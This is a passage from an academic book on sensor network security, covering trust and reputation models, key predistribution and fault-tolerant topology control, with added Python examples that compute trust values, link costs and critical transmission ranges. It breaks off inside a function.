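    """Constructed run: 60 nodes, pool of 500 keys, rings of 30, 5 nodes captured."""
    rng = random.Random(seed)
    rings = make_key_rings(60, 500, 30, rng)
    links = shared_key_discovery(rings)
    poly = random_symmetric_polynomial(3, rng)
    return {
        "expected_p": share_probability(500, 30),
        "measured_connectivity": connectivity(rings, links),
        "exposed_after_5_captures": compromised_fraction(rings, links, {0, 1, 2, 3, 4}),
        "keys_agree": pairwise_key(polynomial_share(poly, 7), 11)
        == pairwise_key(polynomial_share(poly, 11), 7),
    }
```

Calling demo() shows the measured connectivity tracking the analytical p and how quickly captured rings expose links between honest nodes, which is the trade-off between ring size, memory and resilience the text describes.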


The decision making of the trust engine uses two subcomponents:

1. A trust module that can dynamically assess the trustworthiness of the requesting entity based on the trust evidence of any type stored in the evidence store.
2. A risk engine that can dynamically evaluate the risk involved in the interaction, again based on the available evidence in the evidence store.

A common decision-making policy is to choose (or suggest to the user) the action that would maintain the appropriate cost/benefit. For example, in the sensor network application domain, we have to balance ejecting a message or forwarding it based on how much energy has to be spent and the risk of failure in each case to successfully reach the base station or sink. In the background, the evidence manager component is in charge of gathering evidence such as recommendations, comparisons between expected outcomes of the chosen actions and real outcomes, and so forth. These pieces of evidence are used to update risk and trust levels. Thus, trust and risk follow a managed lifecycle.

Although 'subjective logic' (Jøsang, 2001) does not use the notion of risk, it can be considered as a trust engine that integrates the element of ignorance and uncertainty, which cannot be reflected by mere probabilities but is part of the human aspect of trust. In order to represent imperfect knowledge, an opinion is considered to be a triplet whose elements are belief (b), disbelief (d), and uncertainty (u), such that:

b + d + u = 1, {b, d, u} ∈ [0,1]^3

[Figure 1. High-level view of a trust engine. Labels in the figure: Trust Engine's Security Perimeter, Evidence Manager, Evidence Store, Trust Value Computation, Risk Analysis, Decision-making, ER, Virtual Identities; a Request enters and a Decision leaves.]

The relation with trust evidence comes from the fact that an opinion about a binary event can be based on statistical evidence. Information on posterior probabilities of binary events is converted into the b, d, and u elements, each a value in the range [0,1]. The trust value (w) of the virtual identity (T) in the virtual identity (S) concerning the trust context p is:

w^T_p(S) = {b, d, u}

The subjective logic provides more than 10 operators to combine opinions. For example, the recommendation (⊗) operator corresponds to using the recommending trustworthiness (RT) to adjust a recommended opinion. Jøsang's approach can be used in many applications since the trust context is open. In the case of our networks of nodes, we can apply this kind of triple and statistical evidence count to compute the node trust value. For example, in the case of a sink base station and a network of nodes, the messages sent by a node may be acknowledged by the base station by sending an acknowledgement message with strong energy transmission. Depending on which neighbour node was used to forward the message, the sending node can count how many times the sent messages were acknowledged via this neighbour node. Each neighbour node is given a triple (b, d, u) as its trust value. If a message is acknowledged, b is increased by one. If after a timeout the message has still not been acknowledged, d is updated by one. From the sending time of the message to the acknowledgement or the timeout, u is increased by 1 (and then decreased by 1). Concerning the memory/protection cost trade-off (Hwang et al., 2004), it seems to be a reasonable assumption because there are usually few neighbours and there is enough memory space for a few triples. However, each node has to keep the radio link active, in the so-called promiscuous mode, in order to listen to the activity of the neighbours. Since sensors are low energy devices, the energy consumption due to the listening state represents a major drawback of any trust system.

Several other mechanisms have been proposed to make decisions about whether to cooperate or not with their peer nodes based on their previous behaviour. The information used to build the reputation value of the neighbours is collected mainly by direct interactions and following observations. Although it is accurate, it requires some time before enough evidence has been collected. In a scenario consisting of static nodes such as deployed sensors, there is more time to build trust with the neighbour sensors because they do not move. In this case, one may consider using a temporary ramp-up counter of 10 messages in the trust metrics to be sure of the behaviour of the node. If recommendations are used, the reputation of the nodes that provide the recommendations has to be taken into account. In this latter case, it may create a vulnerability to false report attacks. We survey below the other trust models that have been applied to the application domain of resource-constrained nodes and sensor networks.

Michiardi and Molva's (2002) CORE trust model builds the reputation of a sensor as a value that is increased on positive interactions and decreased otherwise. It also takes into account positive ratings from the neighbours. If the aggregated value of the reputation is positive, the sensor cooperates, otherwise it refuses cooperation. Buchegger and Le Boudec's (2004) CONFIDANT trust model considers only negative ratings from the neighbours and monitors the communication to detect the nodes that do not forward the messages. In order to compute a reputation value, different weights are assigned to personal observations and reported reputations. Concerning the memory/protection cost trade-off (Hwang et al., 2004), it seems feasible because they only forward second-hand information/recommendations, called alarms, to a limited number of nodes, called friends, maintained in a simple table. However, the monitor module of CONFIDANT still requires the consumption of a non-negligible amount of energy for resource-constrained nodes. Saurabh and Mani's (2004) trust model uses only positive ratings and models the reputation value as a probabilistic distribution by means of a beta distribution model. A sensor will cooperate with the neighbours that have a reputation value higher than a threshold. Twigg's (2003) trust model focuses on the MANET DSR protocol and on the relation between trust value communication and energy cost. He assumes Friss' free-space attenuation to compute the risk and cost of ejecting to more or less far nodes. He proposes to consider aggregate properties including retransmissions and to calculate the probability of successful transmission before a certain time. Pirzada and McDonald (2005) introduce the use of computational trust based on direct observations to mitigate both sinkhole and wormhole attacks. However, their work is also limited to the MANET DSR protocol. They cover two trust contexts: trust packet precision (TPP) for wormhole and trust packet acknowledgment (TPA) for sinkhole. They combine the two trust contexts. If the sensor is suspected to be a wormhole, the combined trust value T is 0. Otherwise TPP is equal to 1. TPA is a counter that is incremented each time a node is used to forward a packet and an acknowledgement has been received before a timeout; it is decreased otherwise. The inverse of the combined trust value simply replaces the default cost of 1 in the LINK CACHE of the standard DSR protocol. If it is a wormhole the cost is set to infinity.

FUTURE TRENDS

In the future, the importance of the energy asset of the nodes may decrease. For example, a new energy solution may come from new contact-less, distant energy transfer means to recharge nodes, such as via inductive coupling. In addition, although current energy harvesting mechanisms have performance and size limitations, the advances in nanotechnologies may allow even small nodes to effectively harvest energy after deployment.
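Stepping back to the trust models surveyed before this section: the acknowledgement and timeout counting described for the subjective-logic triple, together with the TPP/TPA scheme of Pirzada and McDonald (2005), is small enough to run. The following is an added example, not code from the chapter or from those authors; the event log is constructed, the helper names are its own, and the way TPP and TPA are multiplied into one value (and a non-positive TPA treated as an unusable link) is this example's assumption, as the text does not state the combination rule.

```python
"""Added example, not from the chapter: per-neighbour evidence counters turned
into subjective-logic opinions (ack -> b, timeout -> d, in flight -> u),
Jøsang's recommendation (discounting) operator, and the TPP/TPA combination
of Pirzada and McDonald (2005) mapped to a DSR link cost. Event log, names and
the T = TPP * TPA combination are this example's own assumptions."""
import math
from collections import defaultdict


class NeighbourTrust:
    """Evidence a sending node keeps about one neighbour used for forwarding."""

    def __init__(self):
        self.acked = 0                 # b: messages acknowledged via this neighbour
        self.timed_out = 0             # d: messages that hit the timeout
        self.pending = 0               # u: messages sent and not yet resolved
        self.wormhole_suspect = False  # TPP context: combined T is 0 if suspected

    def opinion(self):
        """Normalise the counters so that b + d + u = 1 with each in [0, 1].
        With no evidence at all the opinion is full uncertainty (0, 0, 1)."""
        total = self.acked + self.timed_out + self.pending
        if total == 0:
            return (0.0, 0.0, 1.0)
        return (self.acked / total, self.timed_out / total, self.pending / total)

    def tpa(self):
        """Trust packet acknowledgment counter: +1 per ack, -1 per timeout."""
        return self.acked - self.timed_out

    def dsr_link_cost(self):
        """Inverse of the combined trust value replaces DSR's default cost of 1.
        Wormhole suspect => infinity (as in the text). Assumed combination
        T = TPP * TPA with TPP = 1; T <= 0 is also treated as unusable here."""
        if self.wormhole_suspect:
            return math.inf
        combined = 1 * self.tpa()
        return math.inf if combined <= 0 else 1.0 / combined


def process_events(events):
    """Replay a time-ordered log of ('send', neighbour, msg_id), ('ack', msg_id),
    ('timeout', msg_id) and ('wormhole', neighbour) events for one sender."""
    trust = defaultdict(NeighbourTrust)
    via = {}  # msg_id -> neighbour the message was forwarded through
    for event in events:
        kind = event[0]
        if kind == "send":
            _, neighbour, msg_id = event
            via[msg_id] = neighbour
            trust[neighbour].pending += 1      # u goes up while in flight ...
        elif kind in ("ack", "timeout"):
            n = trust[via.pop(event[1])]
            n.pending -= 1                     # ... and back down on resolution
            if kind == "ack":
                n.acked += 1                   # b + 1
            else:
                n.timed_out += 1               # d + 1
        elif kind == "wormhole":
            trust[event[1]].wormhole_suspect = True
        else:
            raise ValueError(f"unknown event {event!r}")
    return dict(trust)


def recommend(recommender, recommended):
    """Jøsang's recommendation (discounting) operator: the recommender's own
    trustworthiness (b_r, d_r, u_r) discounts the opinion it reports."""
    br, dr, ur = recommender
    b, d, u = recommended
    return (br * b, br * d, dr + ur + br * u)


# Constructed event log for one sending node with neighbours n1, n2 and n3.
SAMPLE_EVENTS = [
    ("send", "n1", 1), ("send", "n1", 2), ("send", "n2", 3),
    ("ack", 1), ("timeout", 2), ("send", "n1", 4), ("ack", 3),
    ("ack", 4), ("send", "n1", 5), ("send", "n2", 6), ("ack", 6),
    ("send", "n3", 7), ("ack", 7), ("wormhole", "n3"),
]


def summarise(events=SAMPLE_EVENTS):
    """Opinion (b, d, u), TPA counter and DSR link cost per neighbour."""
    return {name: (t.opinion(), t.tpa(), t.dsr_link_cost())
            for name, t in sorted(process_events(events).items())}


if __name__ == "__main__":
    for name, (opinion, tpa, cost) in summarise().items():
        print(f"{name}: (b, d, u)={opinion} TPA={tpa} DSR cost={cost}")
```

Note that n3 has a perfect acknowledgement record yet gets an infinite cost once suspected as a wormhole, which is exactly why the text keeps TPP and TPA as separate contexts.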


Solar cells in new nanomaterials, for example, are much more flexible than before. In this case, the attacks may be turned towards the external harvested energy sources.

The advances in nanotechnologies may also mean that even smaller nodes are possible. In this case, it is likely that current cryptographic mechanisms will have to be scaled down. Routing and communication between these nanoscale nodes may also change dramatically. Quantum computing may introduce even further probabilistic mechanisms with less determinism at the node level than at the level of the nodes as a whole. In this case, decision making under uncertainty may still benefit from the use of computational trust.

CONCLUSION

Due to the resource constraints of the nodes involved in mobile ad hoc or sensor network settings, new security mechanisms are needed to guarantee the survivability of these networks of nodes. However, these new security mechanisms have a strong constraint with regard to their resource consumption. Computational trust management is one of these new schemes that are proposed because the nodes are interdependent and need to collaborate to achieve more than what they can achieve alone. There are still limitations though: both the listening mode and the communication overhead are costly in terms of energy. The cryptographic tasks involved in key management consume less energy but rekeying still necessitates extra communication. There is still some work ahead to fine-tune and combine these new security mechanisms for optimal survivability, be it survivability at the node level or at the network of nodes level.

REFERENCES

Buchegger, S., & Le Boudec, J.-Y. (2004). A robust reputation system for P2P and mobile ad-hoc networks. Paper presented at the Second Workshop on the Economics of Peer-to-Peer Systems.

Cardei, M. (2005). Energy-efficient target coverage in wireless sensor networks. Paper presented at the INFOCOM.

Carle, J., & Simplot-Ryl, D. (2004). Energy-efficient area monitoring for sensor networks. IEEE Computer, 37(2).

Chan, H., Perrig, A., & Song, D. (2003). Random key predistribution schemes for sensor networks. Paper presented at the IEEE Security and Privacy Symposium.

Chatzigiannakis, I., Dimitriou, T., Nikoletseas, S., & Spirakis, P. (2006). A probabilistic algorithm for efficient and robust data propagation in smart dust networks. Elsevier Journal of Ad-hoc Networks, 4(5).

Despotovic, Z., & Aberer, K. (2004). Trust and reputation management in P2P networks. Paper presented at the International Conference on E-Commerce Technology.

Douceur, J. R. (2002). The Sybil attack. Paper presented at the 1st International Workshop on Peer-to-Peer Systems.

Eschenauer, L., & Gligor, V. (2002). A key management scheme for distributed sensor networks. Paper presented at the ACM Conference on Computer and Communications Security.

Friss, H. T. (1946). A note on a simple transmission formula. Paper presented at the Proceedings of IRE.

Handy, M. J., Haase, M., & Timmermann, D. (2002). Low energy adaptive clustering hierarchy with deterministic cluster-head selection. Paper presented at the International Conference on Mobile and Wireless Communications Networks.

Hu, Y., Perrig, A., & Johnson, D. (2002). Wormhole detection in wireless ad hoc networks (Tech. Rep.). Rice University.

Hubaux, J.-P., Buttyán, L., & Capkun, S. (2001). The quest for security in mobile ad hoc networks. Paper presented at the ACM Symposium on Mobile Ad Hoc Networking and Computing.


Hwang, D. D., Lai, B.-C. C., & Verbauwhede, I. (2004). Energy-memory-security tradeoffs in distributed sensor networks. Paper presented at the Ad-hoc Now Conference.

Intanagonwiwat, C., Govindan, R., Estrin, D., Heidemann, J., & Silva, F. (2003). Directed diffusion for wireless sensor networking. IEEE/ACM Transactions on Networking, 11.

Jøsang, A. (2001). A logic for uncertain probabilities. Fuzziness and Knowledge-Based Systems, 9(3).

Kulik, J., Heinzelman, W. R., & Balakrishnan, H. (2002). Negotiation-based protocols for disseminating information in wireless sensor networks. Wireless Networks, 8.

Maltz, D. A. (2001). On-demand routing in multi-hop wireless ad hoc networks. Unpublished doctoral thesis, Carnegie Mellon University.

Marsh, S. (1994). Formalising trust as a computational concept. Unpublished doctoral thesis, University of Stirling, Department of Mathematics and Computer Science.

Martin, T., Hsiao, M., Ha, D., & Krishnaswami, J. (2004). Denial-of-service attacks on battery-powered mobile computers. Paper presented at the 2nd IEEE Pervasive Computing Conference.

McKnight, D. H., & Chervany, N. L. (2000). What is trust? A conceptual analysis and an interdisciplinary model. Paper presented at the Americas Conference on Information Systems.

Michiardi, P., & Molva, R. (2002). Core: A collaborative reputation mechanism to enforce node cooperation in mobile ad hoc networks. Paper presented at the IFIP TC6/TC11 Sixth Joint Working Conference on Communications and Multimedia Security.

Miranda, H., & Rodrigues, L. (2003). Friends and foes: Preventing selfishness in open mobile ad hoc networks. Paper presented at the 23rd International Conference on Distributed Computing Systems.

Mohammed, A. M., & Mohamed, E. (2005). A study of static versus dynamic keying schemes in sensor networks. Paper presented at the 2nd ACM International Workshop on Performance Evaluation of Wireless Ad hoc, Sensor, and Ubiquitous Networks, Montreal, Quebec, Canada.

Ozturk, C., Zhang, Y., & Trappe, W. (2004). Source-location privacy in energy-constrained sensor network routing. Paper presented at the 2nd ACM Workshop on Security of Ad hoc and Sensor Networks.

Perkins, C. E., & Royer, E. M. (1999). Ad hoc on-demand distance vector routing. Paper presented at the 2nd IEEE Workshop on Mobile Computing Systems and Applications.

Pirretti, M., Zhu, S., Narayanan, V., McDaniel, P., Kandemir, M., & Brooks, R. R. (2005). The sleep deprivation attack in sensor networks: Analysis and methods of defense. Paper presented at the Innovations and Commercial Applications of Distributed Sensor Networks Symposia.

Pirzada, A. A., & McDonald, C. (2005). Circumventing sinkholes and wormholes in wireless sensor networks. Paper presented at the International Workshop on Wireless Ad-hoc Networks.

Powell, O., Jarry, A., Leone, P., & Rolim, J. (2006). Gradient based routing in wireless sensor networks: A mixed strategy (Tech. Rep.). University of Geneva.

Romano, D. M. (2003). The nature of trust: Conceptual and operational clarification. Unpublished doctoral thesis, Louisiana State University.

Saurabh, G., & Mani, B. S. (2004). Reputation-based framework for high integrity sensor networks. Paper presented at the 2nd ACM Workshop on Security of Ad hoc and Sensor Networks, Washington D.C.

Schurgers, C., & Srivastava, M. B. (2001). Energy efficient routing in wireless sensor networks. Paper presented at the MILCOM Communications for Network-Centric Operations: Creating the Information Force.

Seigneur, J.-M. (2005). Trust, security and privacy in global computing. Unpublished doctoral thesis, Trinity College Dublin.

Trustcomp. (n.d.). Retrieved August 4, 2006, from http://www.trustcomp.org/

Twigg, A. (2003). A subjective approach to routing in P2P and ad hoc networks. Paper presented at the First International Conference on Trust Management.

Wang, X., Yang, L., & Chen, K. (2005). SDD: Secure directed diffusion protocol for sensor. Security in ad-hoc and sensor networks (Vol. 3313). Springer.

Weiser, M. (1991). The computer for the 21st century. Scientific American.

Xiao, D., Wei, M., & Zhou, Y. (2006). Secure-SPIN: Secure sensor protocol for information via negotiation for wireless sensor networks. Paper presented at the Conference on Industrial Electronics and Applications.

Ye, F., Chen, A., Liu, S., & Zhang, L. (2001). A scalable solution to minimum cost forwarding in large sensor networks. Paper presented at the Tenth International Conference on Computer Communications and Networks.

KEY TERMS

Node: A node may go from the tiny fixed deployed sensor to the unplugged mobile device.

Node(s) Survivability: Emphasises that the scope of the nodes' mission may span more than one node. The survivability of the node itself may be more important than the survivability of the other nodes, or the mission may be that the majority of the nodes survive at the expense of the survival of one specific node.

Reactive Routing Protocols: Compute the route between two nodes only when the route is needed, that is, 'on demand.'

Energy-aware Routing Protocols: Explicitly take into account the energy consumption as a parameter.

To Eject: Means that the sensor increases the power of transmission to be able to reach the base station in one transmission.

Static Keying: Means that the nodes have been allocated keys off-line before deployment, that is, predeployment.

Dynamic Keying: Means that the keys can be (re)generated after deployment.

Network Resilience: The number of captured nodes before an attacker is able to control the network.

Network Connectivity: The probability that two nodes can communicate.

Rekeying Overhead: The network traffic needed to establish a new key.

Trust: Trust 'is a subjective assessment of another's influence in terms of the extent of one's perceptions about the quality and significance of another's impact over one's outcomes in a given situation, such that one's expectation of, openness to, and inclination toward such influence provide a sense of control over the potential outcomes of the situation' (Romano, 2003).

Computed Trust Value: A nonenforceable estimate of the entity's future behaviour in a given context based on evidence ("Trustcomp," n.d.).




Chapter XL
Fault Tolerant Topology Design for Ad Hoc and Sensor Networks
Yu Wang
University of North Carolina at Charlotte, USA

ABSTRACT

Fault tolerance is one of the premier system design desiderata in wireless ad hoc and sensor networks. It is crucial to have a certain level of fault tolerance in most ad hoc and sensor applications, especially for those used in surveillance, security, and disaster relief. In addition, several network security schemes require the underlying topology to provide fault tolerance. In this chapter, we will review various fault tolerant techniques used in topology design for ad hoc and sensor networks, including those for power control, topology control, and sensor coverage.

INTRODUCTION

With great potential in a large number of application fields, ad hoc and sensor networks have been undergoing a revolution that promises a significant impact on society. Unlike traditional fixed infrastructure networks, there are no centralized controls over wireless ad hoc networks, which consist of a collection of devices equipped with wireless communication and networking capability. Any communication and network service in ad hoc networks is done in a self-organized and decentralized manner. Usually connections are multihop routed via intermediate nodes to enable communication between nodes without a direct link. A wireless sensor network is a network of small, wirelessly communicating nodes where each node is equipped with computation, communication, and sensing devices. These nodes usually form a self-organized ad hoc network, observe the physical space around them, and measure some physical signals or detect various phenomena of interest. Ad hoc and sensor networks are widely deployed for environment monitoring, biomedical observation, surveillance, security, disaster relief, and so on.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Fault Tolerant Topology Design for Ad Hoc and Sensor Networks

Ad hoc and sensor networks trigger many challenging research problems, as they intrinsically have many special characteristics and unavoidable limitations compared with other wired or wireless networks. An important requirement of ad hoc and sensor networks is that they should be self-organizing, that is, transmission ranges and data paths are dynamically restructured with changing topology. Energy conservation and network performance are probably the most critical issues in ad hoc and sensor networks, since wireless devices (such as tiny sensor nodes in sensor networks) are usually powered by batteries only and have limited computing capability and memory. Topology control and power control are two primary techniques with respect to energy efficiency in ad hoc and sensor networks.

The topology control technique lets each wireless device locally select certain neighbors for communication, while maintaining a topology that can support energy efficient routing and improve the overall network performance. Unlike traditional wired networks and cellular wireless networks, mobile devices are often moving during communication, which can change the network topology to some extent. Hence it is more challenging to design a topology control algorithm for ad hoc and sensor networks. The power control technique controls the network topology by adjusting the wireless device's transmission range. Reducing the transmission range saves power at each node and reduces the signal interference among neighbors, but it may hurt the connectivity of the induced topology. Power control tries to minimize the power consumption of all nodes while maintaining a topology that is connected and has certain desired properties such as fault tolerance.

Although fault tolerance has been studied for several decades in computer and VLSI systems, limited resources on small devices, lack of centralized control, and high mobility make fault tolerance much harder to achieve in ad hoc and sensor networks. One key characteristic of such networks is that node and link failure is a non-negligible event, in some cases even a regular or common one. This is particularly the case in sensor networks, where the equipment is restricted to a minimum due to limitations in cost and weight. First of all, battery driven sensor nodes may stop working because they run out of energy. Second, the shared wireless medium is inherently less stable than wired media, which results in more packet losses and lower throughput. Third, sensor networks often operate in potentially hostile or at least harsh and unconditioned environments; tiny sensor devices with limited security mechanisms are usually vulnerable to various attacks. Another aspect that influences the required degree of redundancy and fault tolerance is mobility, which is a key issue in ad hoc networks. Therefore, reliability and fault tolerance are emerging as premier and crucial system design desiderata in ad hoc and sensor networks. In addition, fault tolerance design is also one of the basic components of ad hoc and sensor network security.

Fault tolerance strongly depends on the network connectivity. To make fault tolerance possible, first of all, the underlying network topology must be k-connected for some k > 1, that is, given any pair of wireless devices, at least k disjoint paths connect them. With k-connectivity, the network can survive k-1 node/link failures. Traditional topology control or power control solutions cannot cope with these fault tolerance requirements, since fault tolerance is usually sacrificed for power efficiency: in order to be power efficient, topology control and power control algorithms try to reduce the number of links and thereby reduce the redundancy available for tolerating node and link failures. On the other hand, to achieve fault tolerance, existing algorithms usually sacrifice power efficiency. Thus, topology design for ad hoc and sensor networks needs to consider both power efficiency and fault tolerance.

This chapter is focused on fault tolerant topology design for ad hoc and sensor networks. In the second section, fault tolerant techniques used in power control protocols (such as power assignment and critical transmission range) are reviewed. In the third section, we survey fault tolerant design in topology control, that is, how to design fault tolerant geometric or hierarchical structures. In the
fourth section, fault tolerant coverage and protection in sensor networks are discussed. There is a conclusion in the fifth section, while the chapter ends with references and key definitions.

FAULT TOLERANT DESIGN IN POWER CONTROL

Fault tolerant design in power control studies how to set the transmission range for each node in a network such that the induced topology is k-connected, that is, the network can survive k-1 failures. Obviously, by setting the transmission range sufficiently large, the induced network topology will be k-connected. However, as power is a scarce resource in ad hoc and sensor networks, it is important to save power without losing network connectivity. Thus, the question is how to find the minimum transmission range such that the induced topology is multiply connected. There are two sets of research in this direction: the critical transmission range for random networks and minimum power assignment optimization for static networks.

Given n static wireless nodes V, each with transmission range $r_n$, the wireless network can be modeled by the graph $G(V, r_n)$ in which two nodes are connected if their Euclidean distance is no more than $r_n$. The minimum range $r_n$ used by all wireless nodes such that the induced network topology has a certain property (such as connectivity) is called the critical transmission range (CTR). The CTR for connectivity has been studied in the literature (Gupta & Kumar, 1998; Penrose, 1997; Ramanathan & Rosales-Hain, 2000; Sanchez, Manzoni, & Haas, 1999). Characterizing the CTR for connectivity (or k-connectivity) helps the system designer answer fundamental questions such as: (1) given a number of nodes n to be deployed in a region, what is the minimum value of the transmission range that ensures network connectivity (or k-connectivity)?; or (2) given the transmission range of a certain technology, how many nodes need to be distributed over a given region to ensure network connectivity (or k-connectivity)?

Recently, applying stochastic geometry, Penrose (1999), Bettstetter (2002), Li, Wang, Wan, and Yi (2003), and Wan and Yi (2004) studied the CTR that achieves k-connectivity with a certain probability when wireless nodes are uniformly and randomly distributed over a two-dimensional region. Penrose (1999) shows that with high probability the network becomes k-connected when the minimum node degree in the communication graph becomes k. In other words, the CTR for k-connectivity can be characterized by analyzing the probability of the relatively simpler event that every node in the network has degree at least k. Based on Penrose's results, Li et al. (2003) first derive the upper bound and the lower bound of the CTR for k-connectivity in a two-dimensional network. They proved that, given n wireless nodes randomly distributed in a unit square, if the transmission range $r_n$ of the wireless devices satisfies

$$n\pi r_n^2 \ge \ln n + (2k-3)\ln\ln n - 2\ln\big((k-1)!\big) + \alpha + 2\ln\frac{8(k-1)}{2^{k-1}\sqrt{\pi}},$$

then $G(V, r_n)$ is k-connected with probability at least $e^{-e^{-\alpha}}$ as n goes to infinity. Here $\alpha$ is any real number. Wan and Yi (2004) close the gap between the upper bound and the lower bound by giving an exact formula for the probability of k-connectivity when n goes to infinity. They show that the CTR for k-connectivity is

$$r_n = \sqrt{\frac{\log n + (2k-3)\log\log n + f(n)}{\pi n}},$$

where $f(n)$ is an arbitrary function such that $\lim_{n\to\infty} f(n) = +\infty$. Bettstetter (2002) also investigated the minimum node degree and k-connectivity and constructed various simulations to verify his analytical expressions. However, his theoretical result does not consider boundary effects (it assumes the network is distributed over a very large area), which is unrealistic for real networks. Even though theoretical results for the CTR for k-connectivity have been derived, the theoretical bounds only hold when n goes to infinity. How to set the transmission range in a real network where n is a small practical integer is studied by Li et al. (2003) by conducting simulations. Another related work concerns the CTR for connectivity with Bernoulli nodes. So far we have assumed that all nodes always function properly; however, in certain scenarios nodes may be faulty (or put into sleep) with a certain
probability p > 0. Wan and Yi (2005) model this scenario using Bernoulli nodes and study the CTR for connectivity with Bernoulli nodes.

All analytical results on the CTR assume that wireless nodes are randomly distributed and that the transmission range of every node is equal. These assumptions are not always true for ad hoc and sensor networks in practice. Another power control technique is to allow each wireless device to adjust its transmission power according to its neighbors' positions. A natural question is then, given a static network, how to assign the transmission power of each node such that the network is k-connected while minimizing the total (or maximum) transmission power assigned. This kind of optimization question is called minimum power assignment optimization. See Figure 1 for illustrations of minimum total power assignment for k-connectivity (k = 1 or 2).

Figure 1. Illustrations of power control: minimum total power assignment for connectivity

The minimum maximum power assignment problem can be solved in polynomial time by a simple binary-search-based approach (Lloyd, Liu, Marathe, Ramanathan, & Ravi, 2002). The minimum total power assignment for connectivity problem was first studied and proved to be NP-hard by Chen and Huang (1989); there the induced communication graph must be strongly connected while the total power assignment is minimized. Recently, this problem has been heavily studied and many approximation algorithms have been proposed when the network is modeled using symmetric or asymmetric links (Althaus, Calinescu, Mandoiu, Prasad, Tchervenski, & Zelikovsky, 2003; Calinescu, Kapoor, Olshevsky, & Zelikovsky, 2003; Clementi, Penna, & Silvestri, 2000; Clementi, Huiban, Penna, Rossi, & Verhoeven, 2002; Kirousis, Kranakis, Krizanc, & Pelc, 2000; Ramanathan & Rosales-Hain, 2000). Along this line, Calinescu and Wan (2006), Cheriyan, Vempala, and Vetta (2002), and Hajiaghayi, Immorlica, and Mirrokni (2003) consider the minimum total power assignment such that the resulting network is k-connected (or (k-1)-fault tolerant). This problem has been shown to be NP-hard too. Many of the best-known approximation algorithms (e.g., Cheriyan et al., 2002) are based on linear programming (LP) approaches. However, Hajiaghayi et al. (2003) show that for the minimum total power assignment for k-connectivity problem, the natural integer LP formulation has an integrality gap of $\Omega(n/k)$, implying that there is no LP-based approximation algorithm with an approximation factor better than $\Omega(n/k)$. Some heuristics (Bahramgiri, Hajiaghayi, & Mirrokni, 2002; Ramanathan & Rosales-Hain, 2000) have been proposed as well. Bahramgiri et al. (2002) show that the cone-based topology control (CBTC) algorithm by Wattenhofer, Li, Bahl, and Wang (2001) and Li, Halpern, Bahl, Wang, and Wattenhofer (2001) can be extended to achieve k-fault tolerance. Hajiaghayi et al. (2003) also constructed examples demonstrating that the approximation factor of the CBTC algorithm is at least $\Omega(n/k)$. Recently, Lloyd et al. (2002) presented a centralized 8(1-1/n)-approximation for the minimum total power assignment for 2-connectivity problem. Calinescu and Wan (2006) further show that their algorithm achieves a 2k-approximation ratio for the minimum total power
assignment for k-connectivity problem. Hajiaghayi et al. (2003) present algorithms minimizing power while maintaining k-connectivity with guarantees. Their first algorithm gives an $O(kK)$-approximation, where K is the best approximation factor for the related problem in wired networks (the best K so far is $O(\log k)$, by Cheriyan et al., 2002). The second algorithm is based on an approximation algorithm introduced by Kortsarz and Nutov (1994). It is more complicated and achieves an $O(k)$-approximation for general graphs. These first two algorithms are centralized. They then present two distributed approximation algorithms for the cases of 2- and 3-connectivity in geometric graphs with constant approximation ratios. Both of these algorithms use the distributed minimum spanning tree algorithm.

FAULT TOLERANT DESIGN IN TOPOLOGY CONTROL

Topology control algorithms have been proposed to maintain network connectivity while improving energy efficiency and increasing network capacity by keeping only selected links. However, by reducing the number of links in the network, topology control actually decreases the degree of routing redundancy. As a result, the induced topology is more susceptible to node failures or departures. Thus, in this section we review fault tolerant designs that enforce k-connectivity in the topology control process. Usually, there are two sets of solutions for topology control: geometric topology (flat structure) and virtual backbone (hierarchical structure).

Geometric topology control algorithms assume that each node knows the position information of itself and its neighbors and that all nodes have the same transmission range. Using this geometric information, each node makes a local decision to keep some links and remove others. Well-known geometric topologies used in ad hoc networks include the local minimum spanning tree (LMST) (Li, Hou, & Sha, 2003), relative neighborhood graph (RNG) (Bose, Morin, Stojmenovic, & Urrutia, 2001; Seddigh, Gonzalez, & Stojmenovic, 2002), Gabriel graph (GG) (Bose et al., 2001; Karp & Kung, 2000), Yao graph (YG) (Li, Wan, & Wang, 2001; Li, Wan, Wang, & Frieder, 2002) and CBTC (L. Li et al., 2001; Wattenhofer et al., 2001). See Figure 2 for illustrations of their definitions. All of these topologies guarantee connectivity but not fault tolerance. Therefore, variations of these topologies have been proposed to improve fault tolerance, that is, to preserve k-connectivity.

Li and Hou (2004) present a variation of the LMST algorithm to construct a k-connected topology, called the fault-tolerant local spanning subgraph (FLSS_k). Similarly to LMST, the algorithm to build FLSS_k is composed of three phases: information exchange, topology construction, and determination of transmit power. The main difference between LMST and FLSS_k is in the topology construction phase: instead of building a local MST on its neighborhood (such as the two local trees for u and v in Figure 2[a]), a node builds a spanning subgraph that preserves k-connectivity using a simple greedy algorithm. Li and Hou prove that FLSS_k guarantees k-connectivity and maintains bidirectionality for all links in the topology while reducing the power consumption.

Figure 2. Illustrations of the definitions of different topologies

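Returning to the power control section above, the following Python program is a worked example added for this edition; it is not code from the chapter or from any of the cited papers. It shows the two ideas reviewed there in executable form: the minimum maximum power assignment of Lloyd et al. (2002), as a binary search over the sorted pairwise distances for the smallest common range at which a monotone property holds, and the critical transmission range, using Penrose's observation that the range at which every node reaches degree k is, with high probability, the CTR for k-connectivity. The Wan and Yi asymptotic formula is evaluated and checked by Monte Carlo simulation over constructed random deployments in the unit square. The node counts, random seeds, the choice of f(n) values and the use of minimum degree as the tested property are assumptions made for the demonstration.

```python
import math
import random
from typing import Callable, List, Tuple

Point = Tuple[float, float]


def dist(a: Point, b: Point) -> float:
    return math.hypot(a[0] - b[0], a[1] - b[1])


def min_degree(pts: List[Point], r: float) -> int:
    """Minimum node degree of G(V, r): two nodes are adjacent iff their distance is <= r."""
    n = len(pts)
    deg = [0] * n
    for i in range(n):
        for j in range(i + 1, n):
            if dist(pts[i], pts[j]) <= r:
                deg[i] += 1
                deg[j] += 1
    return min(deg) if n else 0


def min_degree_radius(pts: List[Point], k: int) -> float:
    """Smallest common range r at which every node has degree >= k in G(V, r).
    Node i reaches degree k exactly at the distance to its k-th nearest neighbour,
    so the answer is the largest of those distances. By Penrose (1999) this radius
    is, with high probability, also the CTR for k-connectivity."""
    n = len(pts)
    if not 1 <= k < n:
        raise ValueError("need 1 <= k < n")
    worst = 0.0
    for i, p in enumerate(pts):
        d = sorted(dist(p, q) for j, q in enumerate(pts) if j != i)
        worst = max(worst, d[k - 1])
    return worst


def min_max_range(pts: List[Point], holds: Callable[[List[Point], float], bool]) -> float:
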